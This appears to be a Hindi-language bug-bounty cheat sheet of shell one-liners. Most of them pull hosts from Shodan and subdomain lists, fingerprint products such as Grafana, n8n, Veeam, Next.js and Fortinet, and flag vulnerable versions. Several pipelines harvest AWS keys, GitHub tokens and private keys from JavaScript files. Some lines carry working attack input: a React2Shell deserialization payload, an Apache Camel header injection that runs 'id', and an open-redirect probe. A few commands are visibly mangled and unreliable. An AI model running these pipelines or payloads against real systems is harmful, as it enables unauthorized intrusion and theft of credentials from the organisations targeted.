cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt
cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt
> **⚠️ प्रभावित:** लीगेसी D-Link DSL गेटवे राउटर (EOL) | **✅ समाधान:** समर्थित उपकरणों से बदलें
---
### ⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - गंभीर) ⚡🔥⚡
> **💀 Veeam Backup & Replication में Postgres पैरामीटर इंजेक्शन के माध्यम से RCE 💀**
#### ⚡ Veeam Backup सर्वर का पता लगाएं```bash
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt
cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt
> **⚠️ प्रभावित:** Veeam B&R 13.0.1.180 और इससे पहले के संस्करण | **✅ समाधान:** 13.0.1.1071+ पर अपडेट करें
---
### ⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (उच्च गंभीरता) ⚡🔥⚡
> **💀 Grafana में ज़ीरो-डे XSS - 46,500+ इंस्टेंस अभी भी असुरक्षित! खाता अधिग्रहण संभव 💀**
#### ⚡ Grafana इंस्टेंस खोजें```bash
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt
cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+.[0-9]+.[0-9]+"' | anew grafana_versions.txt
#### ⚡ Open Redirect जांचें (CVE-2025-4123 vector)```bash
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt
cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt
> **⚠️ प्रभावित:** कई Grafana संस्करण | **✅ समाधान:** नवीनतम पैच किए गए संस्करण में अपडेट करें
---
### ⚡🔥⚡ CVE-2026 सबडोमेन हंटिंग - मास डिटेक्शन पाइपलाइन ⚡🔥⚡
> **💀 बड़े पैमाने पर सबडोमेन में CVE-2026 कमजोरियों का शिकार करने के लिए 10 वन-लाइनर्स! 💀**
#### ⚡ 1. पूर्ण सबडोमेन CVE-2026 हंट पाइपलाइन (n8n + Grafana + D-Link)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt
subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent
#### ⚡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner```bash
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt
subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'
#### ⚡ 5. Multi-CVE-2026 स्कैनर Nuclei के साथ (समानांतर टेम्पलेट्स)```bash
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt
cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt
#### ⚡ 7. CVE-2026 IoT/राउटर हंट (D-Link DSL + अन्य राउटर)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13.0.[01].[0-9]+" && echo "[CVE-2025-59470 VULN] @"'
#### ⚡ 9. संयुक्त CVE-2026 फिंगरप्रिंट + संस्करण निकालने वाला```bash
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt
domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"
> **🎯 प्रो टिप:** `notify` के साथ जोड़कर रीयल-टाइम अलर्ट प्राप्त करें: `... | notify -silent -provider slack`
---
### ⚡🔥⚡ उन्नत टोही पाइपलाइन - 2026 संस्करण ⚡🔥⚡
> **🎯 व्यापक टोही के लिए 10 विशेषज्ञ वन-लाइनर्स - बहु-स्रोत गणना, एएसएन खोज, जेएस विश्लेषण और बहुत कुछ! 🎯**
#### ⚡ 1. बहु-स्रोत उपडोमेन खोज + तकनीकी फिंगरप्रिंटिंग```bash
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt
अधिकतम subdomain coverage के लिए Subfinder + Assetfinder + Amass को जोड़ता है, फिर httpx + technology fingerprinting से सत्यापित करता है
echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt
> ASN की खोज करता है, IP ब्लॉकों की गणना करता है, छिपे हुए उपडोमेन खोजने के लिए रिवर्स DNS करता है
#### ⚡ 3. URL डिस्कवरी पाइपलाइन (Wayback + GAU + Katana)```bash
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt
वेबैक मशीन, कॉमन क्रॉल, एलियनवॉल्ट से समानांतर URL संग्रह + स्मार्ट डिडुप्लीकेशन के साथ सक्रिय क्रॉलिंग
cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt
> JS फ़ाइलें ढूंढता है, हार्डकोडेड रहस्य (API कुंजियाँ, टोकन, AWS कुंजियाँ) और छिपे API एंडपॉइंट निकालता है
#### ⚡ 5. प्रमाणपत्र पारदर्शिता + सबडोमेन क्रमपरिवर्तन हमला```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt
CT logs enumeration + intelligent permutation (api → api-dev, api-staging) के साथ mass DNS resolution
cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt
> तेज़ पोर्ट स्कैन + असामान्य पोर्ट (8080, 8443, 3000, आदि) पर चल रहे वेब ऐप्स की खोज करता है
#### ⚡ 7. लक्ष्य संगठन के लिए गिटहब डॉर्किंग ऑटोमेशन```bash
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done
गोपनीय जानकारी, क्रेडेंशियल्स और संवेदनशील डेटा एक्सपोज़र के लिए स्वचालित GitHub डॉर्किंग
cat all_urls.txt | grep -oE '(s3.amazonaws.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.s3.amazonaws.com|storage.googleapis.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.blob.core.windows.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200|403" && echo "[+] {} - Accessible"'
> एकत्रित URL से गलत कॉन्फ़िगर किए गए क्लाउड स्टोरेज बकेट को निकालता और मान्य करता है
#### ⚡ 9. पैरामीटर खोज + भेद्यता पैटर्न मिलान```bash
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt
अद्वितीय पैरामीटर निकालता है और भेद्यता प्रकार (XSS, SSRF, SQLi, Redirect) के अनुसार वर्गीकृत करता है
DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt
> पूर्ण स्थायी रीकॉन पाइपलाइन - प्रतिदिन नई संपत्तियों का पता लगाता है और सूचनाएँ भेजता है
> **🎯 प्रो टिप:** 24/7 निगरानी के लिए क्रोन के माध्यम से ओनलाइनर #10 चलाएँ: `0 */6 * * * /path/to/recon_monitor.sh`
---
### ⚡🔥⚡ जावास्क्रिप्ट एंडपॉइंट निष्कर्षण - एलीट तकनीकें 2026 ⚡🔥⚡
> **🎯 जावास्क्रिप्ट फ़ाइलों से एंडपॉइंट, रहस्य और छिपे हुए API निकालने के लिए 10 ओनलाइनर्स! 🎯**
#### ⚡ 1. बड़े पैमाने पर JS फ़ाइल खोज + डाउनलोड पाइपलाइन```bash
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'
Katana के साथ सभी JS फ़ाइलों की खोज करता है, आकार (>500 बाइट्स) के अनुसार फ़िल्टर करता है, ऑफ़लाइन विश्लेषण के लिए डाउनलोड करता है
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '"'"'"'?)['"'"'"]' | sed 's/["'"'"']//g' | sort -u | grep -E "^/" | grep -vE ".(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt
> JavaScript से सभी सापेक्ष API पथ निकालता है, स्थैतिक संपत्तियों को फ़िल्टर करता है
#### ⚡ 3. AWS Keys Hunter JS फ़ाइलों में```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt
AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA पैटर्न) के लिए खोज करता है
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+.firebaseio.com|[a-z0-9-]+.firebaseapp.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt
> Google API कुंजियाँ और Firebase डेटाबेस/ऐप URLs निकालता है
#### ⚡ 5. S3 Bucket की खोज JavaScript में```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'
JS में S3 बकेट ढूंढता है और एक्सेसिबिलिटी की पुष्टि करता है
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.(1[6-9]|2[0-9]|3[01]).[0-9]{1,3}.[0-9]{1,3}|192.168.[0-9]{1,3}.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt
> JavaScript में लीक हुए आंतरिक/निजी IP पतों का पता लगाता है (10.x, 172.16-31.x, 192.168.x)
#### ⚡ 7. Slack Webhooks + Discord Tokens in JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt
Slack वेबहुक URL और Discord बॉट टोकन निकालता है
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt
> GitHub व्यक्तिगत पहुँच टोकन (सभी प्रारूप) और निजी कुंजी हेडर खोजता है
#### ⚡ 9. ईमेल पते + JS में छिपे उपडोमेन```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt
ईमेल पतों और JavaScript में संदर्भित छिपे उपडोमेन को निकालता है
TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE ".js(?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"
> पूर्ण JS recon पाइपलाइन: JS फ़ाइलों की खोज करता है, सभी को डाउनलोड करता है, AWS/Google/GitHub कुंजियाँ और API एंडपॉइंट निकालता है
> **🎯 प्रो टिप:** खोजे गए रहस्यों पर `nuclei -t exposures/tokens/` का उपयोग करें ताकि यह सत्यापित हो सके कि वे सक्रिय हैं!
---
## 🆕 Oneliners 2024-2025
### ⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - गंभीर) ⚡🔥⚡
> **💀 React Server Components और Next.js में गंभीर RCE - सक्रिय शोषण के तहत! CISA KEV में जोड़ा गया 💀**
#### ⚡ Next.js एप्स का पता लगाएं (पहले Recon करें)```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'
#### ⚡ सामूहिक पहचान - अगली कार्रवाई हेडर स्वीकृत```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt
echo '{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B0"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt
#### ⚡ cURL के साथ मैन्युअल भेद्यता जांच```bash
curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"
subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt
#### ⚡ असुरक्षित प्रतिक्रिया हेडर का पता लगाएं```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'
cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt
#### ⚡ Next.js लक्ष्यों के लिए Shodan Dork```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt
nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt
#### ⚡ खोजें और परीक्षण - पूर्ण वन-लाइनर```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt
curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500
#### ⚡ फ़ाइल से समानांतर बैच परीक्षण```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
⚠️ प्रभावित: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ सुधार: React 19.0.1/19.1.2/19.2.1 पर अपडेट करें
🎯 मुख्य पहचान:
Next-Actionहेडर + RSC डिसीरियलाइज़ेशन स्वीकार करने वाले ऐप्स = संभावित RCE
🔍 फरवरी 2026 से महत्वपूर्ण कमजोरियों का पता लगाने के लिए रिकॉन-केंद्रित वनलाइनर्स
⚠️ नोट: कुछ वनलाइनर्स
nuclei-templatesपथों का संदर्भ देते हैं जो आपकी स्थानीय प्रतिलिपि में अभी तक मौजूद नहीं हो सकते हैं। पहलेnuclei -update-templatesचलाएं और चलाने से पहले सुनिश्चित करें कि टेम्पलेट मौजूद है (ls ~/nuclei-templates/...)। आधिकारिक सलाह के विरुद्ध CVE विवरणों की हमेशा पुष्टि करें और अपने अधिकृत दायरे में रहें।
गंभीर भेद्यता (CVSS 10.0) जो Cisco SD-WAN Manager/Controller में प्रमाणीकरण बाईपास की अनुमति देती है। 2023 से उन्नत खतरे वाले अभिकर्ताओं द्वारा शोषित। महत्वपूर्ण बुनियादी ढांचे की सुरक्षा के लिए कमजोर इंस्टेंस का पता लगाना महत्वपूर्ण है।
shodan search "title:"Cisco vManage" port:8443,443" --fields ip_str,port,org,isp,asn --separator " | " | tee cisco-sdwan-targets.txt
---
### ⚡ Microsoft Azure Functions - CVE-2026-21532 की खोज
> **Azure Functions में सूचना प्रकटीकरण भेद्यता (CVSS 8.2) जो बिना प्रमाणीकरण के क्रेडेंशियल्स और संवेदनशील कॉन्फ़िगरेशन के संपर्क की अनुमति देती है। गुप्त लीक को रोकने के लिए संवेदनशील एंडपॉइंट की पहचान करना आवश्यक है।**
#### 1. nuclei के साथ Azure Function एंडपॉइंट की गणना करें```bash
cat domains.txt | httpx -silent | nuclei -t ~/nuclei-templates/http/exposures/apis/azure-function-key.yaml -t ~/nuclei-templates/http/exposures/tokens/ -o azure-functions-exposed.txt
Gradio <6.7 में Windows पर Python 3.13+ के साथ चलने वाले क्रिटिकल पाथ ट्रैवर्सल (CVSS 7.5)। मनमानी फ़ाइल पढ़ने की अनुमति देता है। ML/AI ऐप्स की सुरक्षा के लिए संवेदनशील संस्करणों का पता लगाना महत्वपूर्ण है।
echo "https://target.com" | httpx -silent -tech-detect -json | jq -r 'select(.technologies[]? | select(.name=="Gradio")) | "(.url) - (.technologies[] | select(.name=="Gradio").version // "unknown")"'
---
### ⚡ Gradio Framework - CVE-2026-28416 SSRF खोज
> **ग्रैडियो <6.6.0 में उच्च-गंभीरता वाला SSRF (CVSS 8.2) जो क्लाउड मेटाडेटा सेवाओं (AWS/GCP/Azure) तक पहुँच की अनुमति देता है। क्लाउड क्रेडेंशियल्स से समझौता रोकने के लिए महत्वपूर्ण है।**
#### 1. ग्रैडियो इंस्टेंस को Google Dorks और फिंगरप्रिंटिंग के माध्यम से खोजें```bash
echo "inurl:/gradio/ OR intitle:\"Gradio\"" | gau --subs --threads 10 | httpx -silent -status-code -title -tech-detect | grep -i gradio | tee gradio-instances.txt
FortiOS ≤7.6.6 में कमजोर डिफ़ॉल्ट एन्क्रिप्शन कुंजी के कारण LDAP क्रेडेंशियल्स प्रकटीकरण भेद्यता। दिसंबर 2025 से सक्रिय रूप से शोषित। कमजोर संस्करणों की पहचान करना महत्वपूर्ण है।
shodan search "product:FortiOS" --fields ip_str,version,port,org --separator " | " | awk -F'|' '$2 ~ /^[1-6].|7.[0-5].|7.6.[0-6]/ {print $1 " | Version:" $2 " | " $4}' | tee fortios-vulnerable.txt
---
### ⚡ Dell RecoverPoint for VMs - CVE-2026-22769 खोज
> **गंभीर हार्डकोडेड क्रेडेंशियल्स (CVSS 10.0) Dell RecoverPoint <6.0.3.1 HF1 में। रिमोट रूट एक्सेस की अनुमति देता है। चीनी APT समूहों द्वारा 2024 से शोषित। तत्काल पता लगाना आवश्यक है।**
#### 1. उजागर Dell RecoverPoint का पता लगाएँ और Tomcat Manager की पहचान करें```bash
shodan search "title:\"RecoverPoint\" http.favicon.hash:-1153767654" --fields ip_str,port,http.title,version --separator " | " | anew dell-recoverpoint-targets.txt
SmartScreen/Mark-of-the-Web बाईपास (CVSS 8.8) Windows 10/11 में। दुर्भावनापूर्ण लिंक/शॉर्टकट के माध्यम से कोड निष्पादन की अनुमति देता है। सक्रिय रूप से शोषित जीरो-डे। कमजोर सिस्टम की पहचान करना आवश्यक है।
nmap -p445 --script smb-os-discovery,smb-protocols --open -iL targets.txt -oG - | grep "Windows 10|Windows 11" | awk '{print $2}' | tee windows-vulnerable-hosts.txt
---
### ⚡ Statamic CMS - CVE-2026-28426 XSS खोज
> **गंभीर संग्रहीत XSS (CVSS 8.7) Statamic <5.73.11 और <6.4.0 में SVG/PDF और Antlers टेम्पलेट्स के माध्यम से। विशेषाधिकार वृद्धि की अनुमति देता है। कमजोर संस्करणों का पता लगाना Control Panels की सुरक्षा करता है।**
##### 1. Statamic साइट्स खोजें और CMS संस्करण निकालें```bash
echo "Powered by Statamic" | gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico | httpx -silent -tech-detect -status-code | grep -i statamic | nuclei -t ~/nuclei-templates/technologies/statamic-detect.yaml -o statamic-sites.txt
Chartbrew <4.8.3 में महत्वपूर्ण अप्रमाणित SQL इंजेक्शन (CVSS 9.8)। कनेक्टेड MySQL/PostgreSQL में डेटा पढ़ने/संशोधित करने की अनुमति देता है। कमजोर उदाहरणों का पता लगाना तत्काल आवश्यक है।
cat web-apps.txt | httpx -silent -path /api/health -mc 200 -json | jq -r 'select(.body | contains("chartbrew")) | "(.url) - Version: (.body | fromjson | .version // "unknown")"' | tee chartbrew-instances.txt
---
### ⚡ Chartbrew - CVE-2026-25887 MongoDB RCE डिस्कवरी
> **Chartbrew <4.8.1 में MongoDB क्वेरी इंजेक्शन (CVSS 7.2) के माध्यम से RCE। MongoDB सर्वर पर मनमाना जावास्क्रिप्ट निष्पादन की अनुमति देता है। शोषण से पहले कमजोर उदाहरणों का पता लगाना महत्वपूर्ण है।**
#### 1. कमजोर API की स्कैनिंग करते समय Chartbrew एंडपॉइंट की गणना करें```bash
subfinder -d target.com -silent | httpx -silent | gau --subs | grep -E "chartbrew|/api/.*chart|/api/.*connection" | httpx -silent -status-code -title -tech-detect | grep -i "chartbrew\|mongo" | anew chartbrew-mongodb-endpoints.txt
Apache Camel <4.9.2 में क्रिटिकल हैडर इंजेक्शन (CVSS 9.1) जो HTTP हैडर हेरफेर (
CamelExec*) के माध्यम से फ़िल्टर बाईपास की अनुमति देता है। उजागर कैमल एंडपॉइंट्स का पता लगाना एंटरप्राइज़ इंटीग्रेशन पाइपलाइनों की सुरक्षा करता है।
cat urls.txt | httpx -silent -H "CamelExecCommandExecutable: id" -H "CamelExecCommandArgs: -la" -mc 200 -match-string "uid=" | anew camel-header-injection.txt
### ⚡ Jenkins CI - CVE-2026-30170 Script Console RCE Discovery
> **RCE via Script Console (CVSS 9.8) in Jenkins <2.503 कमजोर या अज्ञात प्रमाणीकरण सक्षम के साथ। मनमाना Groovy निष्पादन की अनुमति देता है। CI/CD की सुरक्षा के लिए उजागर उदाहरणों की पहचान करना तत्काल है।**
#### 1. उजागर Jenkins की पहचान करें और एक सुलभ Script Console की जाँच करें```bash
subfinder -d target.com -silent | httpx -silent -path /script -mc 200 -title -match-string "Script Console" | anew jenkins-script-console-exposed.txt
सूचना प्रकटीकरण (CVSS 7.5) उत्पादन में आत्मनिरीक्षण को सक्षम छोड़े जाने के कारण। यह स्कीमा, म्यूटेशन और संवेदनशील प्रकारों का पूर्ण मानचित्रण करने की अनुमति देता है। खुले आत्मनिरीक्षण वाले एंडपॉइंट का पता लगाने से हमले की सतह के मानचित्रण में गति आती है।
cat urls.txt | grep -Ei "graphql|/api" | httpx -silent -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' -mc 200 -match-string "__schema" | anew graphql-introspection-open.txt
---
### ⚡ Ollama AI - CVE-2026-32154 मॉडल पथ ट्रैवर्सल खोज
---
[Read more](https://github.com/kingofbugbounty/kingofbugbountytips)